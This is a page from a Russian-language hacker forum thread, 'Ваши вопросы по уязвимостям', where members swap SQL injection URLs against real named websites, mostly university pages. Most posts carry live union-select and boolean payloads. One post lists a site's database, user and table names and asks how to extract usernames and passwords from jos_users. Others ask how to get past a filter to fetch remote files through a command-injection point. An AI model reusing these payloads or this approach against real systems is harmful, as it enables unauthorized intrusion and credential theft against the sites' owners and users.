Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    спасибо , счас почитаю)))))
     
  2. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Помимо там описанного не забываем так же о табличке user_privileges из information_schema.

    SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%'

    u36a, но в твоем случае это не прокатит т.к. версия 4.1. Заюзай вариант с LOAD_FILE, как уже было предложено
     
    2 people like this.
  3. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    что то у меня не получается)
    http://studorgs.bowdoin.edu/meddies/members.php?mid=-27+or+1=1/*
    http://cyberbuzz.gatech.edu/ice_hockey/news.php?nid=-4+or+1=1/*&PHPSESSID=8021c6f2f9284e9566bd87b298ef8f30
    http://ext.wsu.edu/pnn/user/viewNotification.php?nid=-2007-326+or+1=1--
    http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+or+1=1/*
    http://www.umass.edu/research/rld/bioportal/viewfac.php?fid=-79+or+1=1/*
     
    #5503 sabe, 20 Feb 2009
    Last edited: 20 Feb 2009
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    http://www.mgv.edu/view_news.php?nid=-1+union+select+1,version(),3,4--
    а в чем проблема?
     
    2 people like this.
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://studorgs.bowdoin.edu/meddies/members.php?mid=28+and+substring(version(),1,1)=3/*
    http://cyberbuzz.gatech.edu/ice_hockey/news.php?nid=5+and+substring(version(),1,1)=3/*
    http://studorgs.bowdoin.edu/meddies/news.php?nid=10+and+substring(version(),1,1)=3
    http://www.mgv.edu/view_news.php?nid=3+union+select+1,version(),3,4--+

    Когда-же ты будешь помнить про третью ветку? :)
     
    #5505 Kakoytoxaker, 20 Feb 2009
    Last edited: 20 Feb 2009
    3 people like this.
  6. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    jokester
    как всегда оставил тройки))

    -mOrGan-
    незаметил)
     
    1 person likes this.
  7. Stalingrad

    Stalingrad Elder - Старейшина

    Joined:
    17 Mar 2006
    Messages:
    49
    Likes Received:
    4
    Reputations:
    0
    Привет,
    Есть адрес :
    http://magicweb.md/news.php?id=-28+union+select+1,2,3,4,5,6,7/*

    DataBase() : usr_mweb2_4
    Version() : 5.0.32-Debian_7etch8-log
    User() : mweb2@localhost

    Tables ### jos_users ,user
    Columns ### ID , group_ID , login , pass , name , email ,lastvisit , ---(это от таблицы user) |

    id , name , username , email , password , usertype --- (от таблицы jos_users )

    Вопрос :
    Я когда пытаюсь писать например :
    magicweb.md/news.php?id=-28+union+select+1,2,3,concat(username,0x3A,passwor d)+from+jos_users/*
    То выскакивает ошибка. Я пытался обходить типа unhex(hex(username)) ,ili convert(username+using+latin1) ... но у меня не выходит вывести данные с таблицы . Подскажите пожалуйста что делать .
     
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Stalingrad
    таблица в другой базе
     
    #5508 sabe, 20 Feb 2009
    Last edited: 20 Feb 2009
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    2sabe,

    Code:
    http://www.umass.edu/research/rld/bioportal/viewfac.php?fid=-79'+union+select+1,2,3,4,5,6,version(),8,9,0,11,12,13,14,15,16,17,18--+
     
    1 person likes this.
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    почему так?

    http://www.diocesispinardelrio.net/active/verunanoticia.php?ID=46+order+by+4--

    однако , http://www.diocesispinardelrio.net/active/verunanoticia.php?ID=46+union+select+1,2,3,4-- не работает... ?
     
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    вроде как инъект без вывода...
    http://www.diocesispinardelrio.net/active/verunanoticia.php?ID=46+and+substring(version(),1,1)=4--

    есть таблица user.
     
    #5511 -m0rgan-, 20 Feb 2009
    Last edited: 20 Feb 2009
  12. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Точно сказать не могу...кодировать не пробовал?
     
  13. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    как?)
     
  14. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    ну hex на пример...
     
  15. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    а ftp:// фильтрует?
     
  16. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    всем привет )
    подскажите когда я проверяю скрип на -> ' но там все нормально , но когда я подставляю большое число пишет что запись с таким номером отсутствует ошибки скуля нет вот примет id=234 нормально а подставиш id=2349999 пишет что не существует. Говорит ли это что есть уязвимость?
    Я вчера впервые провел пхп иньекцию прикольно))))
     
    1 person likes this.
  17. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Читаем:

    http://forum.antichat.ru/thread104591.html
     
  18. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    нет, это говорит о том, о чем оно говорит) что такой записи нету.
    поздравляю
     
  19. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Угу, отсутствие страницы явно уязвимость. Из категории рутовых яваскриптов по протоколу TCP/IP, можно использовать только по вечерам четверга с 19:00 до 23:30 по местному времени.
     
    #5519 .Slip, 20 Feb 2009
    Last edited: 20 Feb 2009
  20. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    laedafess
    фтп не фильттрует))

    -m0rgan-
    какой хекс в смд? или я не понимаю

    при этом фильтрует "http://"
    а https:// не фильтрует.. но так не заливается.. наверника изза того что некому принять сертификат)) ftp:// тоже не фильтрует, фпт бес пароля fetch сможет пробить файл?)

    подскажите как обойти такой фильтр?
     
    #5520 sabe, 20 Feb 2009
    Last edited: 20 Feb 2009
Thread Status:
Not open for further replies.